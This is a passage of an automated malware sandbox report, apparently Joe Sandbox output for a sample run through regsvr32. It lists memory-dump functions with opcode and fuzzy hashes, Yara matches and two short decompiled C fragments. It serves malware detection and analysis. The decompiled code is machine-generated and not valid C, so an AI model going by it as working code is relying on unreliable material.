                                                                                                  • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                  • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E197CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: S}
                                                                                                  • API String ID: 0-4277866985
                                                                                                  • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                  • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                  • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                  • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1BDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: H-
                                                                                                  • API String ID: 0-1037293833
                                                                                                  • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                  • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                  • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                  • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E196D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: u*AR
                                                                                                  • API String ID: 0-611844632
                                                                                                  • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                  • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                  • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                  • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0DBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: g*`
                                                                                                  • API String ID: 0-1142845859
                                                                                                  • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                  • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                  • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                  • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E092F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5$
                                                                                                  • API String ID: 0-3756733592
                                                                                                  • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                  • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                  • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                  • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1A6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: n*=
                                                                                                  • API String ID: 0-1578461029
                                                                                                  • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                  • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                  • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                  • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                  0x18000a87c
                                                                                                  0x18000a885
                                                                                                  0x18000a893

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                  • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                  • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                  • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0B258 Relevance: .3, Instructions: 310COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                  • Instruction ID: 9f99ec4afe463c3d65e7891af141654ab130258026d8ae803094f8bcce9865b7
                                                                                                  • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                  • Instruction Fuzzy Hash: 25E10570E0470ACFDF58DFA8D49A8AEBBB2FB04348F004169D806E72A0D7749A55CBC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E01000 Relevance: .2, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                  • Instruction ID: eb382a2fa6e1578c642a2b340c53041bb8e712ab39063332813b22c09c172f78
                                                                                                  • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                  • Instruction Fuzzy Hash: 34C1CEB9903609CFDB68CF38C49A59D3BF1AF64308F204119EC269A2A6D774D529CB48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1020C Relevance: .2, Instructions: 230COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                  • Instruction ID: e5b02273529ff4e2f98400db5e927122cac23ad4b6fe7fbd2e8477b3c24965a3
                                                                                                  • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                  • Instruction Fuzzy Hash: 75B11770E04B089FDFA8DFA8D48A9DEBBF2FB44348F004519D446B7291D7B8545ACB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0BA2C Relevance: .2, Instructions: 192COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                  • Instruction ID: 4fe12d4a6e3cc9b64fb4cb54069e3b39203353677e2ec66316daf6f8a452269a
                                                                                                  • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                  • Instruction Fuzzy Hash: E9B1F8716087C88FDBBECF24C8892DB7BA9FB45708F504219E9CA8E294DB745745CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1D770 Relevance: .2, Instructions: 191COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                  • Instruction ID: 1d096e51794d3db9846404887e333cb43ad016351a2694671d0b9b609afeb9d9
                                                                                                  • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                  • Instruction Fuzzy Hash: C9814B70D08709EFCB58DFA8C49599EBBF1FB44344F40856EE849EB290DB749A49CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E227EC Relevance: .2, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                  • Instruction ID: f68d8b730eb30d780e84700d1e9cdead8c86efb65c76e66bda06b0ba01d71305
                                                                                                  • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                  • Instruction Fuzzy Hash: D68106B151074D9BDF88CF28C8C99DD7BB0FB483A8FA56218FC0AA6254D774D885CB84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E03ABC Relevance: .2, Instructions: 173COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                  • Instruction ID: 93caef3b9b6bfcdde1c3cf8e7958d832be8a0f06109a11dfebebd6992384d4d4
                                                                                                  • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                  • Instruction Fuzzy Hash: E261207061464D8BDF28DF78D4962AD3BE5FB44308F20613DEC669B2A2D774E906CB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1E310 Relevance: .1, Instructions: 141COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                  • Instruction ID: 19a2a2ca75c567b856dc8e94e20d4c430e33315e6f4059fd7b522b9a56af02b0
                                                                                                  • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                  • Instruction Fuzzy Hash: AC710870508789CBDBF9CF24C8896DE7BE4FB88704F20461DE9999B2A0DB749685CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180007110 Relevance: .1, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                  • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                  • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                  • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E02C78 Relevance: .1, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                  • Instruction ID: b368570bf1d350e4df222e20026aeb2e9dbe922920a386d4a5c04d39bade87b8
                                                                                                  • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                  • Instruction Fuzzy Hash: 8751F770518788CBDBBADF34C8992D97BB0FB58304F90861DD84E8E290DB785749DB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180006818 Relevance: .1, Instructions: 126COMMONLIBRARYCODECrypto
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 56%
                                                                                                  			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0x5388a1408558
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0x5388a1408558
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0x5388a1408558
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0x5388a1408558
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0x5388a1408558
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}
























                                                                                                  0x180006818
                                                                                                  0x180006818
                                                                                                  0x180006818
                                                                                                  0x18000681d
                                                                                                  0x180006822
                                                                                                  0x180006830
                                                                                                  0x180006835
                                                                                                  0x180006838
                                                                                                  0x18000683e
                                                                                                  0x180006844
                                                                                                  0x180006851
                                                                                                  0x18000685a
                                                                                                  0x180006864
                                                                                                  0x180006868
                                                                                                  0x18000686b
                                                                                                  0x180006871
                                                                                                  0x18000687f
                                                                                                  0x180006889
                                                                                                  0x18000688d
                                                                                                  0x180006890
                                                                                                  0x180006893
                                                                                                  0x18000689a
                                                                                                  0x18000689c
                                                                                                  0x18000689c
                                                                                                  0x1800068a6
                                                                                                  0x1800068b0
                                                                                                  0x1800068b8
                                                                                                  0x1800068ba
                                                                                                  0x1800068be
                                                                                                  0x1800068ca
                                                                                                  0x1800068d1
                                                                                                  0x1800068d4
                                                                                                  0x1800068dc
                                                                                                  0x1800068e9
                                                                                                  0x1800068ed
                                                                                                  0x180006905
                                                                                                  0x180006909
                                                                                                  0x18000690c
                                                                                                  0x180006914
                                                                                                  0x180006917
                                                                                                  0x18000691e
                                                                                                  0x18000693d
                                                                                                  0x180006943
                                                                                                  0x180006946
                                                                                                  0x180006959
                                                                                                  0x180006962
                                                                                                  0x180006968
                                                                                                  0x180006979
                                                                                                  0x180006982
                                                                                                  0x180006986
                                                                                                  0x180006992
                                                                                                  0x18000699b
                                                                                                  0x1800069a6
                                                                                                  0x1800069aa
                                                                                                  0x1800069c7

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
                                                                                                  • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                  • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                  • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                  • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E090F8 Relevance: .1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                  • Instruction ID: 1a8cf7e361153ee05d8ecde507b32940e600b1842accababf370ce9d79384b03
                                                                                                  • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                  • Instruction Fuzzy Hash: 1451B2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596290D7B4D6A5CFC0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0B83C Relevance: .1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                  • Instruction ID: 690a3cd36af6d4e0fe4bdb4fe9335abe1d87290ea01d570325dd4519831de842
                                                                                                  • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                  • Instruction Fuzzy Hash: 045129709047498BDF48CF68C8895DEBBF1FB48318F11835CE89AA72A0D7B89A44CF45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E15CC4 Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
